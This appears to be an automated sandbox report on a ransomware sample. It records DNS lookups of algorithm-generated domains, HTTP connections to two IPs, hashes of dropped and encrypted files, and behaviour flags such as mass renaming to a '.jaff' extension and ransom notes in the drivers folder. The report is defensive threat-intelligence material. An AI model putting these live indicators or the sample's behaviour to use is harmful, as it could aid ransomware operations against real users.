US 8.8.8.8:53 tmgskmvaxftffa.com udp
US 8.8.8.8:53 eiiveuuptweirgz.com udp
US 8.8.8.8:53 fryqhsblmvzsal.com udp
US 8.8.8.8:53 eiiveuuptweirgz.com udp
US 8.8.8.8:53 fryqhsblmvzsal.com udp
US 8.8.8.8:53 ohrpszrfydauhfuzyzbk.com udp
US 8.8.8.8:53 zbzxolintzi.com udp
US 8.8.8.8:53 ohrpszrfydauhfuzyzbk.com udp
US 8.8.8.8:53 fidkjesxq.com udp
US 8.8.8.8:53 owsxylebhmuzver.com udp
US 8.8.8.8:53 owsxylebhmuzver.com udp
US 8.8.8.8:53 izaubgigwfl.com udp
US 8.8.8.8:53 avcctrnrxx.com udp
US 8.8.8.8:53 viweabkkfe.com udp
US 8.8.8.8:53 vgcdinjoj.com udp
US 8.8.8.8:53 zbzxolintzi.com udp
US 8.8.8.8:53 fidkjesxq.com udp
US 8.8.8.8:53 izaubgigwfl.com udp
US 8.8.8.8:53 yievjaklo.com udp
US 8.8.8.8:53 hqihrutpabwndvldae.com udp
US 8.8.8.8:53 hqihrutpabwndvldae.com udp
US 8.8.8.8:53 nuepdkau.com udp
US 8.8.8.8:53 rjpkxiywinyhjoqltq.com udp
US 8.8.8.8:53 rjpkxiywinyhjoqltq.com udp
US 8.8.8.8:53 worazowxtkdznvvz.com udp
US 8.8.8.8:53 fzzxkhmkfunhotpjmdoy.com udp
US 8.8.8.8:53 worazowxtkdznvvz.com udp
US 8.8.8.8:53 fzzxkhmkfunhotpjmdoy.com udp
US 8.8.8.8:53 kuyfpapjundhcit.com udp
US 8.8.8.8:53 nxcyhbauwgvdryyz.com udp
US 8.8.8.8:53 kuyfpapjundhcit.com udp
US 8.8.8.8:53 nxcyhbauwgvdryyz.com udp
US 8.8.8.8:53 ajfdmjbywzibf.com udp
US 8.8.8.8:53 ajfdmjbywzibf.com udp
US 8.8.8.8:53 yievjaklo.com udp
US 8.8.8.8:53 nuepdkau.com udp
US 8.8.8.8:53 viweabkkfe.com udp
NL 85.17.31.122:80 viweabkkfe.com tcp
US 8.8.8.8:53 wowsfhnnvlwhlotryvh.com udp
NL 85.17.31.122:80 viweabkkfe.com tcp
US 8.8.8.8:53 ltcfpuctidqqqxxzpikz.com udp
US 8.8.8.8:53 linbzxpkmdtngnbdg.com udp
US 8.8.8.8:53 lscyqrjofqmtn.com udp
DE 169.50.13.61:80 kcubcfuhwwn.com tcp
US 8.8.8.8:53 lscyqrjofqmtn.com udp
US 8.8.8.8:53 wowsfhnnvlwhlotryvh.com udp
US 8.8.8.8:53 ltcfpuctidqqqxxzpikz.com udp
US 8.8.8.8:53 linbzxpkmdtngnbdg.com udp
US 8.8.8.8:53 zkkfpkbbfnmihohix.com udp
DE 169.50.13.61:80 kcubcfuhwwn.com tcp
DE 169.50.13.61:80 kcubcfuhwwn.com tcp
US 8.8.8.8:53 lxpcmncky.com udp
US 8.8.8.8:53 pjgnhujlmwtgf.com udp
US 8.8.8.8:53 zkkfpkbbfnmihohix.com udp
US 8.8.8.8:53 pvqwziehrqscosb.com udp
US 8.8.8.8:53 qxcrbliabignczlmuc.com udp
US 8.8.8.8:53 pvqwziehrqscosb.com udp
US 8.8.8.8:53 qxcrbliabignczlmuc.com udp
DE 169.50.13.61:80 kcubcfuhwwn.com tcp
US 8.8.8.8:53 oismeark.com udp
US 8.8.8.8:53 bfgtwvhgsibiufmcerl.com udp
DE 169.50.13.61:80 kcubcfuhwwn.com tcp
US 8.8.8.8:53 mzwfwjayhom.com udp
US 8.8.8.8:53 kvmihtamuopvagdlrwzg.com udp
US 8.8.8.8:53 pjgnhujlmwtgf.com udp
US 8.8.8.8:53 kvmihtamuopvagdlrwzg.com udp
US 8.8.8.8:53 rtlwqvhwuisfnery.com udp
US 8.8.8.8:53 xzfqmrfmyuaxs.com udp
US 8.8.8.8:53 rtlwqvhwuisfnery.com udp
US 8.8.8.8:53 xzfqmrfmyuaxs.com udp
US 8.8.8.8:53 xtvklujmo.com udp
US 8.8.8.8:53 dxkirxfzwhnnah.com udp
US 8.8.8.8:53 dxkirxfzwhnnah.com udp
US 8.8.8.8:53 bfgtwvhgsibiufmcerl.com udp
US 8.8.8.8:53 vyeaukkyszhdeug.com udp
US 8.8.8.8:53 vyeaukkyszhdeug.com udp
DE 169.50.13.61:80 kcubcfuhwwn.com tcp
US 8.8.8.8:53 cpejcogzznpudbsmaxxm.com udp
US 8.8.8.8:53 cpejcogzznpudbsmaxxm.com udp
US 8.8.8.8:53 zvwbjvhfrkqciz.com udp
US 8.8.8.8:53 zvwbjvhfrkqciz.com udp
US 8.8.8.8:53 pnqclaedmavju.com udp
US 8.8.8.8:53 pnqclaedmavju.com udp
US 8.8.8.8:53 kwsrmhroj.com udp
US 8.8.8.8:53 lxpcmncky.com udp
US 8.8.8.8:53 qwtzjokvjfvecysgypbd.com udp
US 8.8.8.8:53 qwtzjokvjfvecysgypbd.com udp
US 8.8.8.8:53 avcctrnrxx.com udp
US 8.8.8.8:53 oismeark.com udp
US 8.8.8.8:53 mzwfwjayhom.com udp
US 8.8.8.8:53 xtvklujmo.com udp
US 8.8.8.8:53 kwsrmhroj.com udp
US 8.8.8.8:53 vgcdinjoj.com udp
US 8.8.8.8:53 avcctrnrxx.com udp
US 8.8.8.8:53 towhyechciopdte.com udp
US 8.8.8.8:53 tmgskmvaxftffa.com udp
US 8.8.8.8:53 tmgskmvaxftffa.com udp
US 8.8.8.8:53 eiiveuuptweirgz.com udp
US 8.8.8.8:53 eiiveuuptweirgz.com udp
US 8.8.8.8:53 fryqhsblmvzsal.com udp
US 8.8.8.8:53 fryqhsblmvzsal.com udp
US 8.8.8.8:53 ohrpszrfydauhfuzyzbk.com udp
US 8.8.8.8:53 ohrpszrfydauhfuzyzbk.com udp
US 8.8.8.8:53 zbzxolintzi.com udp
US 8.8.8.8:53 fidkjesxq.com udp
US 8.8.8.8:53 owsxylebhmuzver.com udp
US 8.8.8.8:53 owsxylebhmuzver.com udp
US 8.8.8.8:53 izaubgigwfl.com udp
US 8.8.8.8:53 yievjaklo.com udp
US 8.8.8.8:53 hqihrutpabwndvldae.com udp
US 8.8.8.8:53 hqihrutpabwndvldae.com udp
US 8.8.8.8:53 nuepdkau.com udp
US 8.8.8.8:53 vgcdinjoj.com udp
US 8.8.8.8:53 fidkjesxq.com udp
US 8.8.8.8:53 yievjaklo.com udp
US 8.8.8.8:53 izaubgigwfl.com udp
US 8.8.8.8:53 nuepdkau.com udp
US 8.8.8.8:53 rjpkxiywinyhjoqltq.com udp
US 8.8.8.8:53 worazowxtkdznvvz.com udp
US 8.8.8.8:53 rjpkxiywinyhjoqltq.com udp
US 8.8.8.8:53 fzzxkhmkfunhotpjmdoy.com udp
US 8.8.8.8:53 fzzxkhmkfunhotpjmdoy.com udp
US 8.8.8.8:53 kuyfpapjundhcit.com udp
US 8.8.8.8:53 kuyfpapjundhcit.com udp
US 8.8.8.8:53 nxcyhbauwgvdryyz.com udp
US 8.8.8.8:53 nxcyhbauwgvdryyz.com udp
US 8.8.8.8:53 ajfdmjbywzibf.com udp
US 8.8.8.8:53 ajfdmjbywzibf.com udp
US 8.8.8.8:53 worazowxtkdznvvz.com udp
NL 85.17.31.122:80 viweabkkfe.com tcp
US 8.8.8.8:53 wowsfhnnvlwhlotryvh.com udp
US 8.8.8.8:53 linbzxpkmdtngnbdg.com udp
DE 169.50.13.61:80 kcubcfuhwwn.com tcp
US 8.8.8.8:53 lscyqrjofqmtn.com udp
NL 85.17.31.122:80 viweabkkfe.com tcp
US 8.8.8.8:53 ltcfpuctidqqqxxzpikz.com udp
US 8.8.8.8:53 lscyqrjofqmtn.com udp
US 8.8.8.8:53 wowsfhnnvlwhlotryvh.com udp
US 8.8.8.8:53 linbzxpkmdtngnbdg.com udp
US 8.8.8.8:53 ltcfpuctidqqqxxzpikz.com udp
US 8.8.8.8:53 zkkfpkbbfnmihohix.com udp
DE 169.50.13.61:80 kcubcfuhwwn.com tcp
DE 169.50.13.61:80 kcubcfuhwwn.com tcp
US 8.8.8.8:53 lxpcmncky.com udp
US 8.8.8.8:53 pjgnhujlmwtgf.com udp
US 8.8.8.8:53 zkkfpkbbfnmihohix.com udp
US 8.8.8.8:53 pjgnhujlmwtgf.com udp
US 8.8.8.8:53 pvqwziehrqscosb.com udp
US 8.8.8.8:53 qxcrbliabignczlmuc.com udp
DE 169.50.13.61:80 kcubcfuhwwn.com tcp
US 8.8.8.8:53 oismeark.com udp
US 8.8.8.8:53 pvqwziehrqscosb.com udp
US 8.8.8.8:53 qxcrbliabignczlmuc.com udp
DE 169.50.13.61:80 kcubcfuhwwn.com tcp
US 8.8.8.8:53 bfgtwvhgsibiufmcerl.com udp
US 8.8.8.8:53 mzwfwjayhom.com udp
US 8.8.8.8:53 bfgtwvhgsibiufmcerl.com udp
US 8.8.8.8:53 kvmihtamuopvagdlrwzg.com udp
US 8.8.8.8:53 rtlwqvhwuisfnery.com udp
US 8.8.8.8:53 kvmihtamuopvagdlrwzg.com udp
US 8.8.8.8:53 rtlwqvhwuisfnery.com udp
US 8.8.8.8:53 xzfqmrfmyuaxs.com udp
US 8.8.8.8:53 xtvklujmo.com udp
US 8.8.8.8:53 xzfqmrfmyuaxs.com udp
US 8.8.8.8:53 dxkirxfzwhnnah.com udp
US 8.8.8.8:53 vyeaukkyszhdeug.com udp
US 8.8.8.8:53 dxkirxfzwhnnah.com udp
US 8.8.8.8:53 vyeaukkyszhdeug.com udp
DE 169.50.13.61:80 kcubcfuhwwn.com tcp
US 8.8.8.8:53 cpejcogzznpudbsmaxxm.com udp
US 8.8.8.8:53 cpejcogzznpudbsmaxxm.com udp
US 8.8.8.8:53 zvwbjvhfrkqciz.com udp
US 8.8.8.8:53 pnqclaedmavju.com udp
US 8.8.8.8:53 zvwbjvhfrkqciz.com udp
US 8.8.8.8:53 pnqclaedmavju.com udp
US 8.8.8.8:53 kwsrmhroj.com udp
US 8.8.8.8:53 qwtzjokvjfvecysgypbd.com udp
US 8.8.8.8:53 qwtzjokvjfvecysgypbd.com udp
US 8.8.8.8:53 avcctrnrxx.com udp
US 8.8.8.8:53 lxpcmncky.com udp
US 8.8.8.8:53 oismeark.com udp
US 8.8.8.8:53 mzwfwjayhom.com udp
US 8.8.8.8:53 xtvklujmo.com udp
US 8.8.8.8:53 kwsrmhroj.com udp
US 8.8.8.8:53 avcctrnrxx.com udp
US 8.8.8.8:53 vgcdinjoj.com udp
US 8.8.8.8:53 towhyechciopdte.com udp
US 8.8.8.8:53 towhyechciopdte.com udp
US 8.8.8.8:53 tmgskmvaxftffa.com udp
US 8.8.8.8:53 eiiveuuptweirgz.com udp
US 8.8.8.8:53 tmgskmvaxftffa.com udp
US 8.8.8.8:53 eiiveuuptweirgz.com udp
US 8.8.8.8:53 fryqhsblmvzsal.com udp
US 8.8.8.8:53 ohrpszrfydauhfuzyzbk.com udp
US 8.8.8.8:53 fryqhsblmvzsal.com udp
US 8.8.8.8:53 ohrpszrfydauhfuzyzbk.com udp
US 8.8.8.8:53 zbzxolintzi.com udp
US 8.8.8.8:53 fidkjesxq.com udp
US 8.8.8.8:53 owsxylebhmuzver.com udp
US 8.8.8.8:53 owsxylebhmuzver.com udp
US 8.8.8.8:53 izaubgigwfl.com udp
US 8.8.8.8:53 yievjaklo.com udp
US 8.8.8.8:53 hqihrutpabwndvldae.com udp
US 8.8.8.8:53 hqihrutpabwndvldae.com udp
US 8.8.8.8:53 nuepdkau.com udp
US 8.8.8.8:53 vgcdinjoj.com udp
US 8.8.8.8:53 zbzxolintzi.com udp
US 8.8.8.8:53 fidkjesxq.com udp
US 8.8.8.8:53 izaubgigwfl.com udp
US 8.8.8.8:53 yievjaklo.com udp
US 8.8.8.8:53 nuepdkau.com udp
US 8.8.8.8:53 rjpkxiywinyhjoqltq.com udp
US 8.8.8.8:53 rjpkxiywinyhjoqltq.com udp
US 8.8.8.8:53 worazowxtkdznvvz.com udp
US 8.8.8.8:53 worazowxtkdznvvz.com udp
US 8.8.8.8:53 fzzxkhmkfunhotpjmdoy.com udp
US 8.8.8.8:53 fzzxkhmkfunhotpjmdoy.com udp
US 8.8.8.8:53 kuyfpapjundhcit.com udp
US 8.8.8.8:53 kuyfpapjundhcit.com udp
US 8.8.8.8:53 nxcyhbauwgvdryyz.com udp
US 8.8.8.8:53 ajfdmjbywzibf.com udp
US 8.8.8.8:53 ajfdmjbywzibf.com udp
US 8.8.8.8:53 nxcyhbauwgvdryyz.com udp
US 8.8.8.8:53 viweabkkfe.com udp
NL 85.17.31.122:80 viweabkkfe.com tcp
NL 85.17.31.122:80 viweabkkfe.com tcp
US 8.8.8.8:53 lscyqrjofqmtn.com udp
US 8.8.8.8:53 wowsfhnnvlwhlotryvh.com udp
US 8.8.8.8:53 ltcfpuctidqqqxxzpikz.com udp
DE 169.50.13.61:80 kcubcfuhwwn.com tcp
US 8.8.8.8:53 linbzxpkmdtngnbdg.com udp
US 8.8.8.8:53 wowsfhnnvlwhlotryvh.com udp
US 8.8.8.8:53 linbzxpkmdtngnbdg.com udp
US 8.8.8.8:53 ltcfpuctidqqqxxzpikz.com udp
US 8.8.8.8:53 lscyqrjofqmtn.com udp
US 8.8.8.8:53 zkkfpkbbfnmihohix.com udp
DE 169.50.13.61:80 kcubcfuhwwn.com tcp
DE 169.50.13.61:80 kcubcfuhwwn.com tcp
US 8.8.8.8:53 lxpcmncky.com udp
US 8.8.8.8:53 pjgnhujlmwtgf.com udp
US 8.8.8.8:53 pjgnhujlmwtgf.com udp
US 8.8.8.8:53 pvqwziehrqscosb.com udp
US 8.8.8.8:53 qxcrbliabignczlmuc.com udp
DE 169.50.13.61:80 kcubcfuhwwn.com tcp
US 8.8.8.8:53 qxcrbliabignczlmuc.com udp
US 8.8.8.8:53 oismeark.com udp
US 8.8.8.8:53 bfgtwvhgsibiufmcerl.com udp
DE 169.50.13.61:80 kcubcfuhwwn.com tcp
US 8.8.8.8:53 bfgtwvhgsibiufmcerl.com udp
US 8.8.8.8:53 mzwfwjayhom.com udp
US 8.8.8.8:53 kvmihtamuopvagdlrwzg.com udp
US 8.8.8.8:53 kvmihtamuopvagdlrwzg.com udp
US 8.8.8.8:53 rtlwqvhwuisfnery.com udp
US 8.8.8.8:53 xzfqmrfmyuaxs.com udp
US 8.8.8.8:53 xtvklujmo.com udp
US 8.8.8.8:53 dxkirxfzwhnnah.com udp
US 8.8.8.8:53 zkkfpkbbfnmihohix.com udp
US 8.8.8.8:53 vyeaukkyszhdeug.com udp
DE 169.50.13.61:80 kcubcfuhwwn.com tcp
US 8.8.8.8:53 vyeaukkyszhdeug.com udp
US 8.8.8.8:53 cpejcogzznpudbsmaxxm.com udp
US 8.8.8.8:53 zvwbjvhfrkqciz.com udp
US 8.8.8.8:53 cpejcogzznpudbsmaxxm.com udp
US 8.8.8.8:53 zvwbjvhfrkqciz.com udp
US 8.8.8.8:53 pnqclaedmavju.com udp
US 8.8.8.8:53 kwsrmhroj.com udp
US 8.8.8.8:53 pnqclaedmavju.com udp
US 8.8.8.8:53 qwtzjokvjfvecysgypbd.com udp
US 8.8.8.8:53 qwtzjokvjfvecysgypbd.com udp
US 8.8.8.8:53 avcctrnrxx.com udp
US 8.8.8.8:53 lxpcmncky.com udp
US 8.8.8.8:53 oismeark.com udp
US 8.8.8.8:53 mzwfwjayhom.com udp
US 8.8.8.8:53 xtvklujmo.com udp
US 8.8.8.8:53 kwsrmhroj.com udp
US 8.8.8.8:53 avcctrnrxx.com udp
US 8.8.8.8:53 vgcdinjoj.com udp
US 8.8.8.8:53 towhyechciopdte.com udp
US 8.8.8.8:53 towhyechciopdte.com udp
US 8.8.8.8:53 tmgskmvaxftffa.com udp
US 8.8.8.8:53 eiiveuuptweirgz.com udp
US 8.8.8.8:53 eiiveuuptweirgz.com udp
US 8.8.8.8:53 tmgskmvaxftffa.com udp
US 8.8.8.8:53 fryqhsblmvzsal.com udp
US 8.8.8.8:53 ohrpszrfydauhfuzyzbk.com udp
US 8.8.8.8:53 fryqhsblmvzsal.com udp
US 8.8.8.8:53 ohrpszrfydauhfuzyzbk.com udp
US 8.8.8.8:53 zbzxolintzi.com udp
US 8.8.8.8:53 fidkjesxq.com udp
US 8.8.8.8:53 owsxylebhmuzver.com udp
US 8.8.8.8:53 owsxylebhmuzver.com udp
US 8.8.8.8:53 izaubgigwfl.com udp
US 8.8.8.8:53 yievjaklo.com udp
US 8.8.8.8:53 hqihrutpabwndvldae.com udp
US 8.8.8.8:53 hqihrutpabwndvldae.com udp
US 8.8.8.8:53 nuepdkau.com udp
US 8.8.8.8:53 vgcdinjoj.com udp
US 8.8.8.8:53 zbzxolintzi.com udp
US 8.8.8.8:53 fidkjesxq.com udp
US 8.8.8.8:53 izaubgigwfl.com udp
US 8.8.8.8:53 yievjaklo.com udp
US 8.8.8.8:53 nuepdkau.com udp
US 8.8.8.8:53 rjpkxiywinyhjoqltq.com udp
US 8.8.8.8:53 rjpkxiywinyhjoqltq.com udp
US 8.8.8.8:53 worazowxtkdznvvz.com udp
US 8.8.8.8:53 worazowxtkdznvvz.com udp
US 8.8.8.8:53 fzzxkhmkfunhotpjmdoy.com udp
US 8.8.8.8:53 fzzxkhmkfunhotpjmdoy.com udp
US 8.8.8.8:53 kuyfpapjundhcit.com udp
US 8.8.8.8:53 kuyfpapjundhcit.com udp
US 8.8.8.8:53 nxcyhbauwgvdryyz.com udp
US 8.8.8.8:53 nxcyhbauwgvdryyz.com udp
US 8.8.8.8:53 ajfdmjbywzibf.com udp
US 8.8.8.8:53 ajfdmjbywzibf.com udp
NL 85.17.31.122:80 viweabkkfe.com tcp
US 8.8.8.8:53 lscyqrjofqmtn.com udp
US 8.8.8.8:53 ltcfpuctidqqqxxzpikz.com udp
NL 85.17.31.122:80 viweabkkfe.com tcp
US 8.8.8.8:53 wowsfhnnvlwhlotryvh.com udp
DE 169.50.13.61:80 kcubcfuhwwn.com tcp
US 8.8.8.8:53 linbzxpkmdtngnbdg.com udp
US 8.8.8.8:53 ltcfpuctidqqqxxzpikz.com udp
US 8.8.8.8:53 lscyqrjofqmtn.com udp
US 8.8.8.8:53 linbzxpkmdtngnbdg.com udp
US 8.8.8.8:53 zkkfpkbbfnmihohix.com udp
DE 169.50.13.61:80 kcubcfuhwwn.com tcp
DE 169.50.13.61:80 kcubcfuhwwn.com tcp
US 8.8.8.8:53 lxpcmncky.com udp
US 8.8.8.8:53 pjgnhujlmwtgf.com udp
US 8.8.8.8:53 zkkfpkbbfnmihohix.com udp
US 8.8.8.8:53 pjgnhujlmwtgf.com udp
US 8.8.8.8:53 pvqwziehrqscosb.com udp
US 8.8.8.8:53 qxcrbliabignczlmuc.com udp
US 8.8.8.8:53 oismeark.com udp
DE 169.50.13.61:80 kcubcfuhwwn.com tcp
US 8.8.8.8:53 pvqwziehrqscosb.com udp
US 8.8.8.8:53 qxcrbliabignczlmuc.com udp
DE 169.50.13.61:80 kcubcfuhwwn.com tcp
US 8.8.8.8:53 mzwfwjayhom.com udp
US 8.8.8.8:53 kvmihtamuopvagdlrwzg.com udp
US 8.8.8.8:53 kvmihtamuopvagdlrwzg.com udp
US 8.8.8.8:53 rtlwqvhwuisfnery.com udp
US 8.8.8.8:53 rtlwqvhwuisfnery.com udp
US 8.8.8.8:53 xzfqmrfmyuaxs.com udp
US 8.8.8.8:53 xzfqmrfmyuaxs.com udp
US 8.8.8.8:53 xtvklujmo.com udp
US 8.8.8.8:53 bfgtwvhgsibiufmcerl.com udp
US 8.8.8.8:53 dxkirxfzwhnnah.com udp
US 8.8.8.8:53 dxkirxfzwhnnah.com udp
US 8.8.8.8:53 vyeaukkyszhdeug.com udp
US 8.8.8.8:53 vyeaukkyszhdeug.com udp
DE 169.50.13.61:80 kcubcfuhwwn.com tcp
US 8.8.8.8:53 zvwbjvhfrkqciz.com udp
US 8.8.8.8:53 zvwbjvhfrkqciz.com udp
US 8.8.8.8:53 pnqclaedmavju.com udp
US 8.8.8.8:53 pnqclaedmavju.com udp
US 8.8.8.8:53 kwsrmhroj.com udp
US 8.8.8.8:53 lxpcmncky.com udp
US 8.8.8.8:53 oismeark.com udp
US 8.8.8.8:53 xtvklujmo.com udp
US 8.8.8.8:53 qwtzjokvjfvecysgypbd.com udp
US 8.8.8.8:53 qwtzjokvjfvecysgypbd.com udp
US 8.8.8.8:53 avcctrnrxx.com udp
US 8.8.8.8:53 kwsrmhroj.com udp
US 8.8.8.8:53 vgcdinjoj.com udp
US 8.8.8.8:53 towhyechciopdte.com udp
US 8.8.8.8:53 towhyechciopdte.com udp
US 8.8.8.8:53 tmgskmvaxftffa.com udp
US 8.8.8.8:53 tmgskmvaxftffa.com udp
US 8.8.8.8:53 eiiveuuptweirgz.com udp
US 8.8.8.8:53 fryqhsblmvzsal.com udp
US 8.8.8.8:53 eiiveuuptweirgz.com udp
US 8.8.8.8:53 fryqhsblmvzsal.com udp
US 8.8.8.8:53 ohrpszrfydauhfuzyzbk.com udp
US 8.8.8.8:53 zbzxolintzi.com udp
US 8.8.8.8:53 ohrpszrfydauhfuzyzbk.com udp
US 8.8.8.8:53 fidkjesxq.com udp
US 8.8.8.8:53 owsxylebhmuzver.com udp
US 8.8.8.8:53 owsxylebhmuzver.com udp
US 8.8.8.8:53 izaubgigwfl.com udp
US 8.8.8.8:53 avcctrnrxx.com udp
US 8.8.8.8:53 yievjaklo.com udp
US 8.8.8.8:53 vgcdinjoj.com udp
US 8.8.8.8:53 zbzxolintzi.com udp
US 8.8.8.8:53 fidkjesxq.com udp
US 8.8.8.8:53 izaubgigwfl.com udp
US 8.8.8.8:53 hqihrutpabwndvldae.com udp
US 8.8.8.8:53 hqihrutpabwndvldae.com udp
US 8.8.8.8:53 yievjaklo.com udp
US 8.8.8.8:53 rjpkxiywinyhjoqltq.com udp
US 8.8.8.8:53 rjpkxiywinyhjoqltq.com udp
US 8.8.8.8:53 worazowxtkdznvvz.com udp
US 8.8.8.8:53 worazowxtkdznvvz.com udp
US 8.8.8.8:53 fzzxkhmkfunhotpjmdoy.com udp
US 8.8.8.8:53 fzzxkhmkfunhotpjmdoy.com udp
US 8.8.8.8:53 kuyfpapjundhcit.com udp
US 8.8.8.8:53 kuyfpapjundhcit.com udp
US 8.8.8.8:53 nxcyhbauwgvdryyz.com udp
US 8.8.8.8:53 ajfdmjbywzibf.com udp
US 8.8.8.8:53 nxcyhbauwgvdryyz.com udp
US 8.8.8.8:53 ajfdmjbywzibf.com udp

Files

C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe

MD5 d224637a6b6e3001753d9922e749d00d
SHA1 bacb2313289e00a1933b7984dd1cbef01c8019ee
SHA256 9c67320f0a29796abfb5b53ef2fa2fbcb56b33cff6cdb3f96a8d303685e17263
SHA512 08eb7f64f852bbb3403d26a6cbcaa28a5747070b499464bed45b3578fd8ebb31ee97fc15f99a14fab9c01585ba5abeded3bd95aa80c73ce76c5af19bf587c4b0

C:\Users\Admin\AppData\Roaming\Dirty\DirtyDecrypt.exe

MD5 1d27a7210f54a047264f23c7506e9506
SHA1 4116e4e8f34e5e7f3fc6cf23cffd04fb027a1527
SHA256 431111e367629bea37db016682c6354303360cd1419c033a22a26115121ccfe9
SHA512 077054eb1afbe2fd375d409176b61bdc407c8ef10351b4d00ccdc5c02f87a2f99c319a81baa99d92cd8f0bfd32bdf95b54dc6ea4b288a8dc5d9bec9b08523700

memory/2524-25-0x0000000000560000-0x0000000000574000-memory.dmp

memory/2524-27-0x0000000000560000-0x0000000000574000-memory.dmp

memory/1544-32-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\Desktop\SubmitRestore.docx

MD5 4446612912a5ec8d5d8cd95f9509ce70
SHA1 366a195c1a924229370a4bd8560a6e39f3cc8aa4
SHA256 4fc6806875418bead9760fb9c509454187fc27010e992401cb517302cda3503e
SHA512 c3c9a12f7cf45e0e4d31176bf4d2114a7bda022f73a714f06fdc1935aa913e37dcf2d7b920bbbaacf79bcab2f6e3b72f455b123380b1f26612796f630963b723

C:\Users\Admin\Desktop\JoinAssert.xlsx

MD5 9f5c80903acba638dd3378dfbf1dd4d8
SHA1 28497eb0083eab2fd2333d1ec416991d94b60647
SHA256 8e336acd36fa58c52bb0e31d74c05798ec5ebe32a03517109888cf4f36608386
SHA512 3d56d5505843e7209c349426d0ec4a20474ce7baa296981e51a2d25201a291fa71043140187ce237614ae0f26384630ca899199eab1c88931e08f34fb4c1ce9b

C:\Users\Admin\Desktop\ProtectOpen.jpeg

MD5 cb54fdcec39b06b8a0d8ad9a7d15277f
SHA1 c132d948b9eb84218146030a242be84dacaf0164
SHA256 86237bb49cf8e599d0ed25888f52824c0252769e11b6ab1469ca6514bba16b48
SHA512 58830d9751172e47700adc47dd35cfcbc322439c6a1b89510468eabdfcd1413b6d59eedfb7d896336f40dc3c2f862ea1cccc66095f931c41fb6633fa14b2dfe9

C:\Users\Admin\Documents\AssertGroup.doc

MD5 c0fb2b2ac91ee80444a2e217a06223e2
SHA1 6d175d49a3189d166e8872879460c700673093c2
SHA256 d609444710b4d168fe9d73c553b5b3bc6d7365d955626e4974b611b042c8c186
SHA512 1a8cf8b33edddcdecfd245b4a8b0976bd8919dab71b436c3c0fe7f1434a3d237d056c4877cfb171bdb6283c78305b97ea6a95615b946ddda2ab866718293f40c

C:\Users\Admin\Documents\ConvertToSplit.rtf

MD5 6d6378d05a3007f8832799060d9fea65
SHA1 1c43561323710792bf743093e8e7fbaecc78d6a9
SHA256 da15ef2a93668ea7018378be023e5935d8532238af6213ef7afb46d863d1bac2
SHA512 98fcb18c8df98760478acb35b8ae5e637eb87522224d78e2c6a9d258b587f3c2335dda0a273424f573227ed4df252bd79156cca11cb663ded1cb7fce3c9cb1a7

C:\Users\Admin\Documents\RegisterDismount.xls

MD5 95d34c5a89e4c47af4091c10204ef64e
SHA1 808bbe8f54d5d1074a7c7cbe9c238178238aa43f
SHA256 53b53dfa2935552953d3dd3f3faedec83b21072c431486e2656b5df999a1e697
SHA512 df008ed997949756dc0bda7ade5015b0352ed7a0a17eb1599c7ca9b6ffd5f2a512c592fecae1bc8f0f92737fb55251f7133f16d681b3989d7221c4408c9bb66f

C:\Users\Admin\Documents\ShowUpdate.docm

MD5 cfba4c7fb5729350d59b76e28a94392f
SHA1 67f66f41d581e5f69cc87c88ec24707625afc180
SHA256 fbb11cd10f2dfade3409743102b87cf8c5d58a94f6060781ab3bddebc2ec040e
SHA512 15ed14139385bddfbe7a76db78ac60f2c30610f0fcc8a208bf1e6fb4c492588762ef95cb738cb70dfc31a97b222c358c2b2d7092725da7366a728adf363b3661

C:\Users\Admin\Downloads\FindMerge.zip

MD5 6ce6ae1f0d89cce9550fef820039f565
SHA1 d1cf05034bafdd9de877218240fcabed1c33ca0e
SHA256 f10a43c8fa4acbd67533d9aa43d39a79b541ee09d1e093b640499213bf137a7f
SHA512 77fe4910ff5fdbb76733b2f6b007f3600fe3dff9b7c6a715d986f3e6d25c90ca0921cf1892c9f98c93c062a52b46c2a3849879adf91b76c137b10c0200b856a8

C:\Users\Admin\Downloads\PushRedo.xlsm

MD5 285ec44441eb5fc7786bb15aee6d225b
SHA1 d14c09ce5374212ced30a15abfe87d52f1814200
SHA256 0e4f15361f21eaf86a9fec68ca0235c85e2084cd368c12d219591df35f1bb711
SHA512 07df721b34b21789aa3a4bbb4b357bf93ada104a937e04bf1c4f44a781de3e3662d7fdbbb02a4c4bf5a9642d7b4f264952f95af67aa5779187efcc82ea2e795f

memory/1544-186-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\Music\TestWatch.pdf

MD5 3759f2af5beab4c66a061a6a46e5b2dc
SHA1 0eabae664d3a38ac57693dabafc75f80b144bd51
SHA256 f5b0e654f76eaf7c376e11309ea94807d4b35339995b70a564dbf3e092152132
SHA512 206ce46f187be0df586c1ba48fe0c9c35cb271110767627710e6b99b87999425ebb95ee095d2b820647f46c8a4cab274f7d21c2c8ea65a214bd21a51e931a436

C:\Users\Admin\Music\DebugSelect.doc

MD5 5267c8ab6be78c8b0c850382fbf80b66
SHA1 23fb9aa85c177e8bd204619f9e743cd3c6bd8777
SHA256 5b6a8591689486e39e2b27e6ac0270290655b09d2b2368750c6173079fe823e8
SHA512 22c3cbf3fc53688a47fb54040a50b9fa6e9b851e2b3100a440898bbcbe13a1555a614082436c36dc32e29a46822dc263f50f5f6f38b48dfef037d91c7b5f4830

Analysis: behavioral16

Detonation Overview

Submitted

2024-11-22 03:25

Reported

2024-11-22 14:17

Platform

win7-20240729-en

Max time kernel

357s

Max time network

358s

Command Line

"C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe"

Signatures

Renames multiple (4027) files with added filename extension

ransomware

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\drivers\ReadMe.txt.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\drivers\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\drivers\ReadMe.html C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\drivers\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
